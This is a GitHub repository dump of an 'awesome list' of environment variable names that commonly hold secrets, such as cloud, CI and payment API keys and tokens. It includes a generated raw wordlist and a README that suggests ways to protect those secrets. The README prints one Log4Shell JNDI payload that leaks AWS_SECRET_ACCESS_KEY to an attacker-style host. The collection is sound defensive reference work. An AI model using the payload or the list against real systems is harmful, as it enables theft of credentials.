├── .github └── workflows │ └── UpdateRawList.yml ├── CONTRIBUTING.md ├── README.md └── raw_list.txt /.github/workflows/UpdateRawList.yml: -------------------------------------------------------------------------------- 1 | # This is a workflow to generate raw_list.txt based on README.md 2 | 3 | name: UpdateRawList 4 | 5 | on: 6 | # Triggers the workflow on push request events but only for the main branch 7 | push: 8 | branches: [ main ] 9 | 10 | # A workflow run is made up of one or more jobs that can run sequentially or in parallel 11 | jobs: 12 | # This workflow contains a single job called "build" 13 | build: 14 | # The type of runner that the job will run on 15 | runs-on: ubuntu-latest 16 | 17 | # Steps represent a sequence of tasks that will be executed as part of the job 18 | steps: 19 | # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it 20 | - uses: actions/checkout@v2 21 | 22 | - name: Run command in terminal # Run command to get text from README and create raw_list.txt 23 | run: | 24 | printf '%b\n' "$(sed -n '/^-\s*\w*.$/p' README.md | sed -r 's/^.{2}//')" > raw_list.txt 25 | 26 | - name: Commit files # commit the output folder 27 | run: | 28 | git config --local user.email "41898282+github-actions[bot]@users.noreply.github.com" 29 | git config --local user.name "github-actions[bot]" 30 | git add raw_list.txt 31 | git commit -m "[BOT] Auto update raw_list.txt" 32 | 33 | - name: Push changes # push the output folder to your repo 34 | uses: ad-m/github-push-action@master 35 | with: 36 | github_token: ${{ secrets.GITHUB_TOKEN }} 37 | force: true 38 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing to **Awesome list of secrets in environment variables [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)** 2 | 3 | 👍🎉 First off, thanks for taking the time to contribute! 🎉👍 4 | 5 | Feel free to add more secrets in environment variables. Please use the below template: 6 | 7 | --- 8 | 9 | 10 | 11 | ``` 12 | ## EXAMPLE_SERVICE_NAME 13 | - EXAMPLE_SECRET_1 14 | - EXAMPLE_SECRET_2 15 | 16 | source: [https://EXAMPLE_DOCUMENTATION_LINK.com](https://EXAMPLE_DOCUMENTATION_LINK.com) 17 | ``` 18 | 19 | ## EXAMPLE_SERVICE_NAME 20 | - EXAMPLE_SECRET_1 21 | - EXAMPLE_SECRET_2 22 | 23 | source: [https://EXAMPLE_DOCUMENTATION_LINK.com](https://EXAMPLE_DOCUMENTATION_LINK.com) 24 | 25 | 26 | --- 27 | 28 | ### Please remember add only **popular services and secrets** (token, passwords, logins, api key... ) 29 | 30 | You don't need to modify **raw_list.txt**, it is auto-generated from README.md by GitHub action. 31 | 32 |

33 | If you don't want to PR/commit, you can [add new issue to project](https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables/issues/new) to share extra secrets. 34 | 35 | 36 |
37 | Thanks, 38 |
39 | Maciej Pulikowski 40 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter 2 | | Follow me on 3 | 4 | 5 |
6 | 7 | --- 8 | 9 | # **Awesome list of secrets in environment variables [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)** 10 | 11 | # 📝 Description 12 | 13 | List of secrets, passwords, API keys, tokens stored inside a system environment variables. 14 | 15 | **An environment variable** is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice. 16 | 17 | Many developer documentations recommends storing secrets inside an environment variable, but is it the best way to keep secrets? 18 | 19 | The attacker can read values inside system environment variable by using exploits: 20 | - CVE-2021-44228 JNDI log4j (JAVA) ([Read more...](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words#1-system-environment-variables)) 21 | 22 | `${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}` 23 | 24 | Get **AWS_SECRET_ACCESS_KEY** or return **NO_EXISTS** 25 | - CVE-XXXX-XXXX Web browser attack (Writeup/POC coming soon to my Github - Follow me on [Github](https://github.com/Puliczek) and [Twitter](https://twitter.com/pulik_io) 😉 26 | - and much more... 27 | 28 | Because of that I created, a list of secrets in environment variables to help secure software. 29 | 30 | Some of practices to avoid leak of secrets stored in environment variables is to: 31 | - Block/notify on WAF when the request includes system environment variables 32 | - Store in system environment variable path to a config file, instead of clean value 33 | - Encrypt values inside environment variable 34 | - Use different way to store secrets 🤓 35 | 36 | ![Environment variables](https://user-images.githubusercontent.com/12344862/147656611-8726c036-128b-4ad4-a19b-c019c2d6b1ea.png) 37 | 38 | 39 | You can check your system environment variables: 40 | - Windows execute in PowerShell: `dir env:` 41 | - Linux/MacOS execute in terminal: `printenv` or `env` 42 | 43 | 44 | # **Awesome list of secrets in environment variables** 45 | # A 46 | ## AWS 47 | - AWS_ACCESS_KEY_ID 48 | - AWS_SECRET_ACCESS_KEY 49 | - AMAZON_AWS_ACCESS_KEY_ID 50 | - AMAZON_AWS_SECRET_ACCESS_KEY 51 | 52 | source: https://docs.aws.amazon.com/sdkref/latest/guide/setting-global-aws_secret_access_key.html 53 | 54 | ## Algolia 55 | - ALGOLIA_API_KEY 56 | 57 | source: https://www.algolia.com/doc/framework-integration/symfony/getting-started/installation/?client=php 58 | ## Azure 59 | - AZURE_CLIENT_ID 60 | - AZURE_CLIENT_SECRET 61 | - AZURE_USERNAME 62 | - AZURE_PASSWORD 63 | - MSI_ENDPOINT 64 | - MSI_SECRET 65 | 66 | source: https://docs.microsoft.com/en-us/dotnet/api/azure.identity.environmentcredential?view=azure-dotnet 67 |
68 | source: https://techcommunity.microsoft.com/t5/azure-developer-community-blog/understanding-azure-msi-managed-service-identity-tokens-caching/ba-p/337406 69 | # B 70 | ## Binance 71 | - binance_api 72 | - binance_secret 73 | 74 | source: https://algotrading101.com/learn/binance-python-api-guide/ 75 | 76 | ## Bittrex 77 | - BITTREX_API_KEY 78 | - BITTREX_API_SECRET 79 | 80 | source: https://github.com/TeamWertarbyte/crypto-trading-bot/blob/development/README.md 81 | # C 82 | ## Cloud Foundry 83 | - CF_PASSWORD 84 | - CF_USERNAME 85 | 86 | source: https://cli.cloudfoundry.org/en-US/v6/auth.html 87 | 88 | ## Code Climate 89 | - CODECLIMATE_REPO_TOKEN 90 | 91 | source: https://docs.codeclimate.com/docs/command-line-interface 92 | 93 | ## Coveralls 94 | - COVERALLS_REPO_TOKEN 95 | 96 | source: https://docs.coveralls.io/supported-ci-services 97 | 98 | ## CircleCI 99 | - CIRCLE_TOKEN 100 | 101 | source: https://circleci.com/docs/2.0/api-developers-guide/ 102 | # D 103 | ## Digitalocean 104 | - DIGITALOCEAN_ACCESS_TOKEN 105 | 106 | source: https://github.com/digitalocean/doctl#authenticating-with-digitalocean 107 | 108 | ## Dockerhub 109 | - DOCKER_EMAIL 110 | - DOCKER_PASSWORD 111 | - DOCKER_USERNAME 112 | 113 | source: https://github.com/marketplace/actions/publish-docker 114 | ## Dockerhub 115 | - DOCKERHUB_PASSWORD 116 | 117 | source: https://circleci.com/docs/2.0/env-vars/ 118 | # E 119 | # F 120 | ## Fastlane products 121 | - ITC_PASSWORD 122 | 123 | source: https://github.com/phatblat/fastlane-variables 124 | ## Facebook 125 | - FACEBOOK_APP_ID 126 | - FACEBOOK_APP_SECRET 127 | - FACEBOOK_ACCESS_TOKEN 128 | 129 | ## Firebase 130 | - FIREBASE_TOKEN 131 | - FIREBASE_API_TOKEN 132 | 133 | source: https://firebase.google.com/docs/cli 134 | 135 | ## Fossa 136 | - FOSSA_API_KEY 137 | 138 | source: https://docs.fossa.com/docs/api-reference 139 | 140 | # G 141 | ## Github 142 | - GH_TOKEN 143 | - GITHUB_TOKEN 144 | - GH_ENTERPRISE_TOKEN 145 | - GITHUB_ENTERPRISE_TOKEN 146 | 147 | source: https://cli.github.com/manual/gh_help_environment 148 | 149 | ## Gitlab 150 | - CI_DEPLOY_PASSWORD 151 | - CI_DEPLOY_USER 152 | 153 | source: https://docs.gitlab.com/ee/user/project/deploy_tokens/ 154 | 155 | ## Google Cloud 156 | - GOOGLE_APPLICATION_CREDENTIALS 157 | - GOOGLE_API_KEY 158 | 159 | source: https://cloud.google.com/docs/authentication/getting-started#windows 160 | 161 | ## Gitlab 162 | - CI_DEPLOY_USER 163 | - CI_DEPLOY_PASSWORD 164 | - GITLAB_USER_LOGIN 165 | - CI_JOB_JWT 166 | - CI_JOB_JWT_V2 167 | - CI_JOB_TOKEN 168 | 169 | source: https://docs.gitlab.com/ee/ci/variables/predefined_variables.html 170 | # H 171 | 172 | ## Heroku 173 | - HEROKU_API_KEY 174 | - HEROKU_API_USER 175 | 176 | source: https://devcenter.heroku.com/articles/authentication 177 | # I 178 | # J 179 | # K 180 | # L 181 | # M 182 | ## Mailgun 183 | - MAILGUN_API_KEY 184 | 185 | source: https://www.pulumi.com/registry/packages/mailgun/installation-configuration/ 186 | 187 | ## MongoDB 188 | - MCLI_PRIVATE_API_KEY 189 | - MCLI_PUBLIC_API_KEY 190 | 191 | https://docs.mongodb.com/mongocli/stable/configure/environment-variables/ 192 | # N 193 | 194 | ## NGROK 195 | - NGROK_TOKEN 196 | - NGROK_AUTH_TOKEN 197 | 198 | source: - 199 | ## NPM 200 | - NPM_TOKEN 201 | - NPM_AUTH_TOKEN 202 | 203 | source: https://docs.npmjs.com/using-private-packages-in-a-ci-cd-workflow 204 | 205 | # O 206 | ## OKTA 207 | - OKTA_CLIENT_ORGURL 208 | - OKTA_CLIENT_TOKEN 209 | - OKTA_OAUTH2_CLIENTSECRET 210 | - OKTA_OAUTH2_CLIENTID 211 | - OKTA_AUTHN_GROUPID 212 | 213 | source: https://developer.okta.com/okta-sdk-java/apidocs/com/okta/sdk/client/ClientBuilder.html 214 | ## Oracle OpenStack command-line client 215 | - OS_USERNAME 216 | - OS_PASSWORD 217 | 218 | source: [https://docs.openstack.org/ocata/user-guide/common/cli-set-environment-variables-using-openstack-rc.html](https://docs.openstack.org/ocata/user-guide/common/cli-set-environment-variables-using-openstack-rc.html) 219 |
220 | source: https://docs.oracle.com/cd/E78305_01/E78304/html/openstack-envars.html 221 | 222 | # P 223 | ## Percy.io 224 | - PERCY_TOKEN 225 | 226 | source: https://docs.percy.io/docs/environment-variables 227 | 228 | ## PostgreSQL 229 | - POSTGRES_PASSWORD 230 | 231 | source: https://www.postgresql.org/docs/current/libpq-envars.html 232 | 233 | # Q 234 | # R 235 | # S 236 | ## Sauce Labs 237 | - SAUCE_ACCESS_KEY 238 | - SAUCE_USERNAME 239 | 240 | source: https://docs.saucelabs.com/basics/environment-variables/ 241 | 242 | ## Sentry 243 | - SENTRY_AUTH_TOKEN 244 | 245 | source: https://docs.sentry.io/product/cli/configuration/ 246 | 247 | ## Slack 248 | - SLACK_TOKEN 249 | 250 | source: https://slack.dev/node-slack-sdk/getting-started 251 | 252 | ## Square 253 | - square_access_token 254 | - square_oauth_secret 255 | 256 | source: https://www.npmjs.com/package/square/v/12.0.0?activeTab=readme 257 | 258 | ## Stripe 259 | - STRIPE_API_KEY 260 | - STRIPE_DEVICE_NAME 261 | 262 | source: https://stripe.com/docs/cli/api_keys 263 | 264 | ## Surge 265 | - SURGE_TOKEN 266 | - SURGE_LOGIN 267 | 268 | source: https://surge.sh/help/integrating-with-circleci 269 | 270 | # T 271 | ## Twilio 272 | - TWILIO_ACCOUNT_SID 273 | - TWILIO_AUTH_TOKEN 274 | 275 | Source: https://www.twilio.com/blog/2017/01/how-to-set-environment-variables.html 276 | 277 | ## Twitter 278 | - CONSUMER_KEY 279 | - CONSUMER_SECRET 280 | 281 | source: https://developer.twitter.com/en/docs/authentication/guides/authentication-best-practices 282 | 283 | ## Travis Ci 284 | - TRAVIS_SUDO 285 | - TRAVIS_OS_NAME 286 | - TRAVIS_SECURE_ENV_VARS 287 | 288 | source: https://docs.travis-ci.com/user/environment-variables 289 | 290 | ## Telegram 291 | - TELEGRAM_BOT_TOKEN 292 | 293 | # U 294 | # V 295 | ## Vault HashiCorp 296 | - VAULT_TOKEN 297 | - VAULT_CLIENT_KEY 298 | 299 | source: https://www.vaultproject.io/docs/commands 300 | 301 | ## Vultr 302 | - TOKEN 303 | - VULTR_ACCESS 304 | - VULTR_SECRET 305 | 306 | source: https://www.vultr.com/docs/deploying-javascript-unikernels-to-vultr-with-ops 307 | # W 308 | # X 309 | # Y 310 | # Z 311 | 312 | ## Get a RAW list: 313 | 314 | The repository includes the raw list: 315 | 316 | [raw_list.txt](https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables/blob/main/raw_list.txt) 317 | 318 | It is auto-generated from README.md by GitHub action. 319 | 320 | # 😎 Contributing 321 | 👍🎉 First off, thanks for taking the time to contribute! 🎉👍 322 | 323 | If you would like to add more secrets: 324 |
325 | [Please read and follow our Contributing guide](https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables/blob/main/CONTRIBUTING.md) 326 | 327 | Thanks! 🦄 328 | 329 | # 💻 Useful links 330 | 331 | - [Stackoverflow - Is it secure to store passwords as environment variables (rather than as plain text) in config files?](https://stackoverflow.com/questions/12461484/is-it-secure-to-store-passwords-as-environment-variables-rather-than-as-plain-t) 332 | - [Google - Best practices for securely using API keys](https://support.google.com/googleapi/answer/6310037?hl=en) 333 | - [An Introduction to Environment Variables and How to Use Them](https://medium.com/chingu/an-introduction-to-environment-variables-and-how-to-use-them-f602f66d15fa) 334 | - [Why you shouldn't use ENV variables for secret data](https://diogomonica.com/2017/03/27/why-you-shouldnt-use-env-variables-for-secret-data/) 335 | - [The Triumph and Tragedy of .env Files](https://blog.doppler.com/the-triumph-and-tragedy-of-env-files) 336 | 337 | # 🤝 Show your support 338 | 339 |
🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter 340 | | Follow me on 341 | 342 | 343 |
344 | 345 | # ✔️ Disclaimer 346 | This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author. 347 | -------------------------------------------------------------------------------- /raw_list.txt: -------------------------------------------------------------------------------- 1 | AWS_ACCESS_KEY_ID 2 | AWS_SECRET_ACCESS_KEY 3 | AMAZON_AWS_ACCESS_KEY_ID 4 | AMAZON_AWS_SECRET_ACCESS_KEY 5 | ALGOLIA_API_KEY 6 | AZURE_CLIENT_ID 7 | AZURE_CLIENT_SECRET 8 | AZURE_USERNAME 9 | AZURE_PASSWORD 10 | MSI_ENDPOINT 11 | MSI_SECRET 12 | binance_api 13 | binance_secret 14 | BITTREX_API_KEY 15 | BITTREX_API_SECRET 16 | CF_PASSWORD 17 | CF_USERNAME 18 | CODECLIMATE_REPO_TOKEN 19 | COVERALLS_REPO_TOKEN 20 | CIRCLE_TOKEN 21 | DIGITALOCEAN_ACCESS_TOKEN 22 | DOCKER_EMAIL 23 | DOCKER_PASSWORD 24 | DOCKER_USERNAME 25 | DOCKERHUB_PASSWORD 26 | FACEBOOK_APP_ID 27 | FACEBOOK_APP_SECRET 28 | FACEBOOK_ACCESS_TOKEN 29 | FIREBASE_TOKEN 30 | FIREBASE_API_TOKEN 31 | FOSSA_API_KEY 32 | GH_TOKEN 33 | GH_ENTERPRISE_TOKEN 34 | CI_DEPLOY_PASSWORD 35 | CI_DEPLOY_USER 36 | GOOGLE_APPLICATION_CREDENTIALS 37 | GOOGLE_API_KEY 38 | CI_DEPLOY_USER 39 | CI_DEPLOY_PASSWORD 40 | GITLAB_USER_LOGIN 41 | CI_JOB_JWT 42 | CI_JOB_JWT_V2 43 | CI_JOB_TOKEN 44 | HEROKU_API_KEY 45 | HEROKU_API_USER 46 | MAILGUN_API_KEY 47 | MCLI_PRIVATE_API_KEY 48 | MCLI_PUBLIC_API_KEY 49 | NGROK_TOKEN 50 | NGROK_AUTH_TOKEN 51 | NPM_AUTH_TOKEN 52 | OKTA_CLIENT_ORGURL 53 | OKTA_CLIENT_TOKEN 54 | OKTA_OAUTH2_CLIENTSECRET 55 | OKTA_OAUTH2_CLIENTID 56 | OKTA_AUTHN_GROUPID 57 | OS_USERNAME 58 | OS_PASSWORD 59 | PERCY_TOKEN 60 | POSTGRES_PASSWORD 61 | SAUCE_ACCESS_KEY 62 | SAUCE_USERNAME 63 | SENTRY_AUTH_TOKEN 64 | SLACK_TOKEN 65 | square_access_token 66 | square_oauth_secret 67 | STRIPE_API_KEY 68 | STRIPE_DEVICE_NAME 69 | SURGE_TOKEN 70 | SURGE_LOGIN 71 | TWILIO_ACCOUNT_SID 72 | CONSUMER_KEY 73 | CONSUMER_SECRET 74 | TRAVIS_SUDO 75 | TRAVIS_OS_NAME 76 | TRAVIS_SECURE_ENV_VARS 77 | TELEGRAM_BOT_TOKEN 78 | VAULT_TOKEN 79 | VAULT_CLIENT_KEY 80 | TOKEN 81 | VULTR_ACCESS 82 | VULTR_SECRET 83 | --------------------------------------------------------------------------------